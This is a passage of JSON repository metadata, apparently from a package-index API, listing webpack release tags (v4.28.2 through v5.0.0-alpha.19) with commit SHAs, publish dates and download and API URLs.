ind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/w